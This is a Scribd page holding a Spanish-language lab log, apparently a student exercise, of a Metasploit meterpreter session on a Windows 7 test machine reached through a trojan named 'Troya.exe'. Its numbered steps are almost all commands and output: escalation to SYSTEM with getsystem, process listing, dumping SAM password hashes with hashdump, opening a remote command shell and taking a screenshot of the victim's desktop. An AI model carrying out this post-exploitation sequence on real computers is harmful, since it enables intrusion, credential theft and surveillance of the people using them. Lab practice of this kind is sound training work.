Scribd Logo
Upload

Welcome to Scribd!

  • Backdoor

    Uploaded by

    Jesus david Martinez Avila
    8 views4 pages

    Original Title

    backdoor

    Copyright

    © © All Rights Reserved

    Available Formats

    TXT, PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document

    Copyright:

    © All Rights Reserved
    Download as TXT, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    8 views4 pages

    Backdoor

    Uploaded by

    Jesus david Martinez Avila

    Copyright:

    © All Rights Reserved
    Download as TXT, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 4

    1.

    id de la sesion

    msf6 exploit(multi/handler) > sessions -l

    Active sessions
    ===============

    Id Name Type Information Connection


    -- ---- ---- ----------- ----------
    1 meterpreter x64/windows test-PC\victima @ TEST-PC 192.168.2.4:5344 ->
    192.168.2.5:49320 (192.168.2.5)

    2. informacion del host

    meterpreter > sysinfo


    Computer : TEST-PC
    OS : Windows 7 (6.1 Build 7601, Service Pack 1).
    Architecture : x64
    System Language : es_CO
    Domain : WORKGROUP
    Logged On Users : 2
    Meterpreter : x64/windows
    meterpreter >

    3. informacion del usuario

    meterpreter > getuid


    Server username: test-PC\victima
    meterpreter > getprivs

    Enabled Process Privileges


    ==========================

    Name
    ----
    SeBackupPrivilege
    SeChangeNotifyPrivilege
    SeCreateGlobalPrivilege
    SeCreatePagefilePrivilege
    SeCreateSymbolicLinkPrivilege
    SeDebugPrivilege
    SeImpersonatePrivilege
    SeIncreaseBasePriorityPrivilege
    SeIncreaseQuotaPrivilege
    SeIncreaseWorkingSetPrivilege
    SeLoadDriverPrivilege
    SeManageVolumePrivilege
    SeProfileSingleProcessPrivilege
    SeRemoteShutdownPrivilege
    SeRestorePrivilege
    SeSecurityPrivilege
    SeShutdownPrivilege
    SeSystemEnvironmentPrivilege
    SeSystemProfilePrivilege
    SeSystemtimePrivilege
    SeTakeOwnershipPrivilege
    SeTimeZonePrivilege
    SeUndockPrivilege
    meterpreter > getsystem
    ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
    meterpreter > getuid
    Server username: NT AUTHORITY\SYSTEM
    meterpreter >

    4. listar procesos

    meterpreter >ps

    Process List
    ============

    PID PPID Name Arch Session User Path


    --- ---- ---- ---- ------- ---- ----
    0 0 [System Process]
    4 0 System x64 0
    252 4 smss.exe x64 0 NT AUTHORITY\SYSTEM \
    SystemRoot\System32\smss.exe
    288 464 svchost.exe x64 0 NT AUTHORITY\Servicio de red C:\
    Windows\system32\svchost.exe
    332 324 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\
    Windows\system32\csrss.exe
    368 360 csrss.exe x64 1 NT AUTHORITY\SYSTEM C:\
    Windows\system32\csrss.exe
    376 324 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\
    Windows\system32\wininit.exe
    404 360 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\
    Windows\system32\winlogon.exe
    464 376 services.exe x64 0 NT AUTHORITY\SYSTEM C:\
    Windows\system32\services.exe
    472 376 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\
    Windows\system32\lsass.exe
    480 376 lsm.exe x64 0 NT AUTHORITY\SYSTEM C:\
    Windows\system32\lsm.exe
    552 464 sppsvc.exe x64 0 NT AUTHORITY\Servicio de red C:\
    Windows\system32\sppsvc.exe
    576 464 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\
    Windows\system32\svchost.exe
    644 464 svchost.exe x64 0 NT AUTHORITY\Servicio de red C:\
    Windows\system32\svchost.exe
    732 464 svchost.exe x64 0 NT AUTHORITY\SERVICIO LOCAL C:\
    Windows\System32\svchost.exe
    772 464 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\
    Windows\System32\svchost.exe
    796 464 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\
    Windows\system32\svchost.exe
    940 464 svchost.exe x64 0 NT AUTHORITY\SERVICIO LOCAL C:\
    Windows\system32\svchost.exe
    984 368 conhost.exe x64 1 test-PC\victima C:\
    Windows\system32\conhost.exe
    1052 464 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\
    Windows\System32\spoolsv.exe
    1088 464 svchost.exe x64 0 NT AUTHORITY\SERVICIO LOCAL C:\
    Windows\system32\svchost.exe
    1148 3036 powershell.exe x64 1 test-PC\victima C:\
    Windows\System32\WindowsPowerShell\v1.0\POWErshElL.exe
    1168 2016 explorer.exe x64 1 test-PC\victima C:\
    Windows\Explorer.EXE
    1200 464 svchost.exe x64 0 NT AUTHORITY\SERVICIO LOCAL C:\
    Windows\system32\svchost.exe
    1508 2232 powershell.exe x64 1 test-PC\victima C:\
    Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    1668 464 wmpnetwk.exe x64 0 NT AUTHORITY\Servicio de red C:\
    Program Files\Windows Media Player\wmpnetwk.exe
    1780 464 SearchIndexer.exe x64 0 NT AUTHORITY\SYSTEM C:\
    Windows\system32\SearchIndexer.exe
    1856 3540 powershell.exe x64 1 test-PC\victima C:\
    Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    1968 464 taskhost.exe x64 1 test-PC\victima C:\
    Windows\system32\taskhost.exe
    2036 772 dwm.exe x64 1 test-PC\victima C:\
    Windows\system32\Dwm.exe
    2112 464 svchost.exe x64 0 NT AUTHORITY\SERVICIO LOCAL C:\
    Windows\System32\svchost.exe
    2232 1148 powershell.exe x64 1 test-PC\victima C:\
    Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    2248 1508 cmd.exe x64 1 test-PC\victima C:\
    Windows\system32\cmd.exe
    2452 732 audiodg.exe x64 0
    2860 1168 cmd.exe x64 1 test-PC\victima C:\
    Windows\system32\cmd.exe
    2892 368 conhost.exe x64 1 test-PC\victima C:\
    Windows\system32\conhost.exe
    3236 368 conhost.exe x64 1 test-PC\victima C:\
    Windows\system32\conhost.exe
    3308 368 conhost.exe x64 1 test-PC\victima C:\
    Windows\system32\conhost.exe
    3404 464 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\
    Windows\System32\svchost.exe
    3464 1856 powershell.exe x64 1 test-PC\victima C:\
    Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    3540 3780 powershell.exe x64 1 test-PC\victima C:\
    Windows\System32\WindowsPowerShell\v1.0\POWErshElL.exe
    3780 1168 Troya.exe x64 1 test-PC\victima C:\
    Users\victima\Desktop\Troya.exe

    meterpreter >

    5. copia de los hashes de las sam

    meterpreter > hashdump


    Administrador:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
    :::
    HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:1ba39fdd7b6bea2ea561ca8704d6e4
    63:::
    Invitado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    test:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    victima:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    meterpreter >

    6. iniciar shell

    meterpreter > shell


    Process 3916 created.
    Channel 2 created.
    Microsoft Windows [Versi�n 6.1.7601]
    Copyright (c) 2009 Microsoft Corporation. Reservados todos los derechos.
    C:\Windows\system32>cd /
    cd /

    C:\>dir
    dir
    El volumen de la unidad C no tiene etiqueta.
    El n�mero de serie del volumen es: 8031-DD9E

    Directorio de C:\

    13/07/2009 10:20 p.m. <DIR> PerfLogs


    08/05/2021 12:22 a.m. <DIR> Program Files
    08/05/2021 12:23 a.m. <DIR> Program Files (x86)
    08/05/2021 01:38 p.m. <DIR> Users
    23/04/2021 09:02 p.m. <DIR> Windows
    0 archivos 0 bytes
    5 dirs 1.958.588.416 bytes libres

    C:\>

    7. hacer un screenshot

    meterpreter > screenshot


    Screenshot saved to: /home/kali/MWujvuxO.jpeg
    meterpreter >

    You might also like